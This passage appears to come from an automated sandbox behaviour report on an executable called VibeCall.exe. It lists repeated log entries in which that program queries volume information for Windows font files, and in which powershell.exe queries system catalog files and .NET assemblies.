                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
